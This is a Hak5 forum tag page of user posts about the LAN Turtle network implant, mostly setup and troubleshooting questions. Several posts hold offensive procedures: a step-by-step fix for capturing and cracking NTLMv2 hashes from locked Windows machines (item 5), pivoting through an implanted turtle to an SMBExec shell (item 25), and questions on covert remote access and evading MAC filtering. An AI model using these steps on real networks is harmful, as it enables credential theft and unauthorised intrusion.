Jump to content

Search the Community

Showing results for tags 'lan turtle'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. Is there a way to interact with the lan turtle via cobalt strike? If so, how do you set it up/configure?
  2. I would like to know what are the differences between the Quickcreds module and the Responder module on a LAN Turtle. I've attempted to google this, but it seems like they are the same thing even though they are separate modules in Module Manager on LAN Turtle.
  3. Does anyone know how to use the "scp device.config root@172.16.84.1:/etc/" command using Windows 10?
  4. I own and operate a LAN Turtle and would like to add a 3G SIM hardware module to it. I don't know if there are any website pages out there explaining this process, and shop.hak5.org store support representative didn't seem to have the technical information and referred me to the hak5 support forum. Before anyone at Hak5 feels a need to caution me about voiding warranties I'm not concerned about that, just want clarification on how to make the modification. Afterall, those interested in hak5 products tend to use them for hacking and reverse engineering purposes, right? Anyway, looking at the main board on the LAN Turtle I believe I see a UART and possibly a 1-wire serial connection so maybe it is as simple as connecting the 3G SIM module to a serial port? Any feedback on this would be much appreciated. Thx! Chad
  5. After much chagrin and googling, we found that QuickCreds will not work on the lan turtle because of disk space issues. Here's our fix! (we take no responsibility if you break something/somebody. Only hack when you have prior approval and authorization!) Factory reset, or push the turtle-5.bin firmware to reset (probably need to upgrade to v5 anyway). This makes sure you are set to base. YMMV. Open the lan turtle, push and hold the reset button for at least 5 seconds after plugging it into the machine ssh in to 172.16.84.1, sh3llz, change password Update the modules list Only install QuickCreds for now, so we have enough space Select QuickCreds and configure Let it install it's dependencies You can now set QuickCreds to 'Enable' so that it will start at boot DO NOT REBOOT YET! At this point, we're going to exit and git clone the responder package DO NOT INSTALL RESPONDER FROM THE TURTLE MODULES LIST ITSELF Exit 'turtle' back to a basic root shell Git clone the Responder package first to /tmp since there is plenty of space. git clone git://github.com/lgandx/Responder /tmp/Responder BUT DON'T REBOOT YET, CAUSE YOU'LL LOSE EVERYTHING IN /tmp du -sh /tmp/Responder 3.8M rm -rf /tmp/Responder/.git rm -rf /tmp/Responder/tools/MultiRelay/ du -sh /tmp/Responder 450.5k We also want to remove the git package as it takes up >1MB of space. QuickCreds installs it /only/ to git the Responder package 😕 opkg remove git df -h 1.2M available on / Move the Responder package back to /etc/turtle/ for QuckCreds to find it mv /tmp/Responder/ /etc/turtle/ df -h 1.1M still available on / now (w00t) The QuickCreds module is hardcoded to use br-lan as the interface. This doesn't exist, so we need to change it to eth0. Another 😕 sed -i 's/br-lan/eth0/' /etc/turtle/modules/QuickCreds You should now have at least 1MB of storage on / and plenty of space for /root/loot to write to, as well as have Responder available for QuickCreds Pop the turtle in a Windows system and wait about 30 seconds until the amber light goes solid, CREDS!!! Copy and paste the hash from /root/loot/#/HTTP-NTLMv2-172.16.84.127.txt Paste into a hash file and send it to john with a wordlist john hash.txt --wordlist=wordlist.txt Testing shows this works whether the laptop is locked or not locked. These hashes can not be replayed, only cracked. You still have plenty of space to return to the turtle shell and install any other modules you need at this point. You may need git for something else, but probably not enough space. This set up is for the "Grab creds from a locked Workstation" scenario. You may need MultiRelay for something else...? Not needed for QuickCreds. ENJOY!
  6. Can anyone recommend a carrier for the using the 3G LAN ?? I am currently a T-Mobile customer and could add a line but wanted to make sure I explored all options before just adding a line for basically data only. Thanks for all the help!
  7. Hi guys, If you're getting the error: urlsnarf: br-lan: No such device exists (SIOCGIFHWADDR: No such device) Fear not it's an easy fix. You just need to swap out br-lan in the module code for eth0. Here's a foolproof guide on how to do that: 1) Load up your LAN Turtle, then 'Esc' at the main menu to take you to the Turtle terminal. 2) Type the following to go to modules cd /etc/turtle/modules/ 3) Use the following command to edit the urlsnarf module nano urlsnarf 4) Hit Ctrl + \ and type br-lan hit enter then type eth0 hit enter again and then press A to apply the replacement to all instances of 'br-lan' in the code 5) Hit Ctrl + O to save the module 6) You're done! Ctrl + X to exit. urlsnarf should now successfully read any non-secure web-traffic...remember HTTPS site traffic will not show here!
  8. Hello, I just received my first LanTurtle and i wanted to test it with the quickcreds module, however when the modul is loaded en I plug it in a Logged on machine, the orange light keeps blinking and there are no log files what so ever, the module script keeps making the number folders but they are all empty. and the responder.log only states -->> Starting attack...
  9. I am quite new to the world of hacking, and recently I have invested in the lan-turtle, and I was wondering what everyone's suggestions were on what Hak5 tool I should invest in next? '
  10. Got a question im wondering about. Lest say i plug a Turtle on an Enterprise Network. The kind that have Active Directory and Cisco Routers, That filter devices by Mac address and not allowing machines that are not approved to connect and set off Unwanted Alarms. Will a Turtle survive or become Turtle soup?! I didn't undertood exactly the way it work. Does it have its own nic to get an ip and create vpn or share the ip of the machine and create vpn with that machine. In an enterprise Network its better to use 3G Turtle right? If i don't have outside network or its filtered. If the Turtle SD does have a nic and wont work(get blocked).
  11. While we all wait I thought I'd put together the Hak5 Kit To Rule Them All (it's a slow day in school today). Long Range USB WiFi Adapter $19.99 Micro Ethernet Switch $14.99 WiFi Pineapple - TETRA $199.99 WiFi Pineapple - NANO $99.99 Hak5 Field Kit Pocket Guide $19.99 WiFi Pineappling Book $12.00 LAN Turtle - LAN Turtle 3G $250.00 LAN Turtle - LAN Turtle SD $54.99 LAN Turtle - LAN Turtle Classic $44.99 USB Rubber Ducky - USB Rubber Ducky Deluxe $44.99 Bash Bunny $99.99 Packet Squirrel $59.99 SUBTOTAL: $921.90 Adapters & Cables: USB OTG adapter Micro USB Y-Cable USB A to USB C adapter USB A male to female extension Micro SD USB card reader Micro USB cables USB Ethernet adapter Retractable Ethernet cable Elite Hak5 Gear organizer Pair of Trust Your Technolust key-ring flight tags Anker PowerCore+ 13400 USB Battery SUBTOTAL: $????
  12. I have purchased about 80% of your equipment, Pineapple Mark V, Nano tactical, bash bunny, pocket squirrel, lan turtle, usb rubber ducky, router, wifi dongles, etc. Unfortunately I purchased them separately as they came out. Therefore I don't have a custom Hak5 case to keep them in. I wish you would consider selling the cases separately. I would be your first customer to buy one. Love your products, and the show.
  13. Hi, Just a question - got the LAN Turtle 3G to play with and want to make it more "believable" as an adapter - how easy or hard would it be to change out the USB to USB-C? Any tips or recommendations? Thoughts on tools required? Much appreciated from a newbie, jenku
  14. I've set up an OpenVPN Server on my VPS with OpenVPN Road Warrior Installer. How does one configure the client.ovpn to act as a gateway? Like mentioned in this Youtube Tutorial. I know how to configure this in OpenVPN Acces Server, but I don't want to replace the Road Warrior Installation with OpenVPN AS. Thanks in advance, Dan
  15. Hello All, I have been in and out of the scene for years and I needed to hack into a few devices for work recently. Anyway with my interest reinvigorated I was wanting to know what would be a good starting point to purchase one of these devices. I'm up in the air on this as I will probably end up with another one once I purchase a field kit. I'm leaning toward the USB Rubber Ducky or the LAN Turtle as cash is a bit tight right now. On the flip side of this though is if I get the Wifi Pineapple Nano I will not end up with a double device if I get the Elite Field Kit as that comes with the Tetra.I figure when the Upgraded Field Kits release they will have the Bash Bunny also. Then I will have all the Things! YAY! Opinions, thoughts, and what is your reasoning? Thank you in advance for all feedback, neotracer
  16. Received my lan turtle awhile back. Just found time to play with it. I am running windows 10. First item: The lan turtle seems very loose in every usb port I have tried it. I have tried it in several different computers and it seems to jiggle and does not fit tight.Second item: None of my windows computers will recognize it. I was able to use putty to ssh into it and change the password but cannot update it. I attach a ethernet cable to it and click update and get the message "must be connected to internet to update" What am I doing wrong? I am a noob at this.
  17. Is it possible to enable SSH logging on the LAN Turtle? I have enabled logging in sshd_config, however no logs occur when remotely accessing the Turtle via SSH. Thanks!
  18. Hello, I just received my first LanTurtle and i wanted to test it with the quickcreds module, however when the modul is loaded en I plug it in a Logged on machine, the orange light keeps blinking and there are no log files what so ever, the module script keeps making the number folders but they are all empty. and the responder.log only states -->> Starting attack...
  19. I have followed the wiki steps for factory resetting the Lan Turtle ( https://lanturtle.com/wiki/#!index.md ) In addition to this, I have followed this fellow who seems to have had the same problem. (And fixed it) However, I am having absolutely no luck reaching the internal webserver of the lan turtle. Once I type in 192.168.1.1 into my web browser, it hangs for approximately 2 seconds, and states that there is no internet. If someone could help me asap, it would be greatly appreciated, as I need it for a demonstration this week. (Tomorrow evening) Thank you for your time. PS. If it helps, I am on the Parrot operating system, although I do have both windows and default debian installed as well. (I've tried all 3 OSs, and still no luck.)
  20. I have followed the wiki steps for factory resetting the Lan Turtle ( https://lanturtle.com/wiki/#!index.md ) In addition to this, I have followed this fellow who seems to have had the same problem. (And fixed it) However, I am having absolutely no luck reaching the internal webserver of the lan turtle. Once I type in 192.168.1.1 into my web browser, it hangs for approximately 2 seconds, and states that there is no internet. If someone could help me asap, it would be greatly appreciated, as I need it for a demonstration this week. Thank you for your time. PS. If it helps, I am on the Parrot operating system, although I do have both windows and default debian installed as well. (I've tried all 3 OSs, and still no luck.)
  21. Hallo, I have one question about the Lan Turtle. When i connect the Lan turtle in a PC from a "big" network so the lan turtle has acces to the network, doesnt it? When i want to start a MITM attack, have the target device only be in the same network or should i connect the lan turtle directly to the targetet device? So for example i plug in the lan turtle in "PC206" and i want to attack the "PC259" does it works or should i plug in the turtle in PC259? I Hope you understand my question :) Thanks in advice, Simon PS: sorry for my bad englisch, im not a native speaker
  22. I am a security tester and I have been hired at a public school. What I'm wanting to achieve is to be able to access the school network from my home. I understand on connecting my computer and the turtle to a vpn. Example: «My home computer» > VPN > lan turtle > school computer > «school network» Basically the goal is to plug the turtle (with the right modules) into a computer and plug the Ethernet cord into the lan turtle. Then go home and access the network and do what I need to do. Example: Ethernet > lan turtle > school computer > school network The questions are: 1. Does the host computer (the one with the turtle plugged in) need to be on? 2. Does the host computer being logged off matter? 3. Would my theory work? 4. How could I get a list of every user on the network (school systems are tricky, any user can be Logged in on any computer)? 5. Will it just be that school network or will I also access the entire county school network?
  23. Hi, I purchased the lan turtle this May from Edutech Hakshop, and was on the side until some days ago when I decided to play with it. Unfortunately I discovered that I cannot SSH to it, with or without the LAN cable on the other side. I tried both my Macbook and in WIN10 through a Virtual Box machine but no luck, even though I can see the Realtek USB device in Virtual Box. I would like to ask if this needs to be replaced, or you suggest me to try a "Factory Reset" first? Thanks
  24. Received my LAN Turtle today and have been hacking away for past hour. However, when I tried to set up autossh, I began seeing filesystem errors. It seems file system is full and has no more disk space. I uninstalled all modules and still continue to see the errors. Here is some output for your kind reading :) root@turtle:~# ssh -ash: ssh: Input/output error root@turtle:~# dmesg | tail [ 25.800000] SQUASHFS error: xz_dec_run error, data probably corrupt [ 25.800000] SQUASHFS error: squashfs_read_data failed to read block 0x300242 [ 25.810000] SQUASHFS error: Unable to read data cache entry [300242] [ 25.820000] SQUASHFS error: Unable to read page, block 300242, size 1a790 [ 25.820000] SQUASHFS error: Unable to read data cache entry [300242] [ 25.830000] SQUASHFS error: Unable to read page, block 300242, size 1a790 [ 25.840000] SQUASHFS error: Unable to read data cache entry [300242] [ 25.840000] SQUASHFS error: Unable to read page, block 300242, size 1a790 [ 25.850000] SQUASHFS error: Unable to read data cache entry [300242] [ 25.860000] SQUASHFS error: Unable to read page, block 300242, size 1a790 [ 25.860000] SQUASHFS error: Unable to read data cache entry [300242] root@turtle:~# df -h Filesystem Size Used Available Use% Mounted on rootfs 4.6M 4.5M 104.0K 98% / /dev/root 10.3M 10.3M 0 100% /rom tmpfs 30.0M 92.0K 29.9M 0% /tmp /dev/mtdblock3 4.6M 4.5M 104.0K 98% /overlay overlayfs:/overlay 4.6M 4.5M 104.0K 98% / tmpfs 512.0K 0 512.0K 0% /dev Any suggestions folks? Thanks.
  25. Hi all! Just wanted to share something that might help other Lan Turtlers out there. One of the things I wanted to do with my lan turtle was to pivot my tools from my local box through the turtle. One such way is to use proxychains to proxy your local tools through your VPS in the cloud, and out through your turtle. My setup: [Local Kali box] --> (Router) --> [VPS] --> [turtle, which is inside victim network] I ran into trouble trying to figure out how to setup an SSH proxychain to it...found this article which worked right away: https://superuser.com/questions/332850/ssh-as-socks-proxy-through-multiple-hosts I used the first line, which was this command: ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p machine-b" machine-c Here, machine-b would be the username@ip_of_VPS_in_cloud and machine-c would be the turtle, which should be root@localhost -p 2222 By replacing the "$PORT" with whatever you want (I used 9050, the default in the proxychains.conf), it would work flawlessly. Basically, what we are doing here is creating a Socks Proxy through SSH that goes through our VPS in the cloud, and then logs into the turtle (which already connects back to that VPS, through AutoSSH). With this tunnel, all you need to do is open up your proxychains.conf (/etc/proxychains.conf) and edit the last line to reflect the port you used. After that, you are all set! In Kali, just prepend "proxychains" before the tool you want to use.....for example! I wanted to be able to use Veil-Pillage from my local Kali box to get a SMBExec shell (because I already had credentials). So, by setting up the tunnel above, I ran root@kali#proxychains ./Veil-Pillage Which would take me to dialogue screen, I chose number 25, set my target (which was 10.13.37.27, a win7 VM) and my creds, and just hit ran! Veil-Pillage: post-explotation framework | [Version]: 1.1.2 ========================================================================= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ========================================================================= [*] Executing module: Smbexec Shell... [*] Type 'exit' to exit the shell Trying protocol 445/SMB... Creating service SystemDiag... |S-chain|-<>-***.***.***.***-<><>-10.13.37.27:445-<><>-OK [!] Launching semi-interactive shell - Careful what you execute C:\Windows\system32> And there you have it!! I thought this should be useful for everyone out there. Another way of doing it is to use your metasploit/armitage instance in the VPS, use the meterpreter module, setup the Socks4 proxy, and then setup proxychains to reflect your VPS instance. Don't forget to add route! Let me know your thoughts! TL;DR: SSH socks proxy -- root@kali#ssh -f -N -D $PORT -oProxyCommand="ssh -W %h:%p VPS-in-cloud" turtle-in-VPS then change proxychains.conf, then "proxychains tool"
×
×
  • Create New...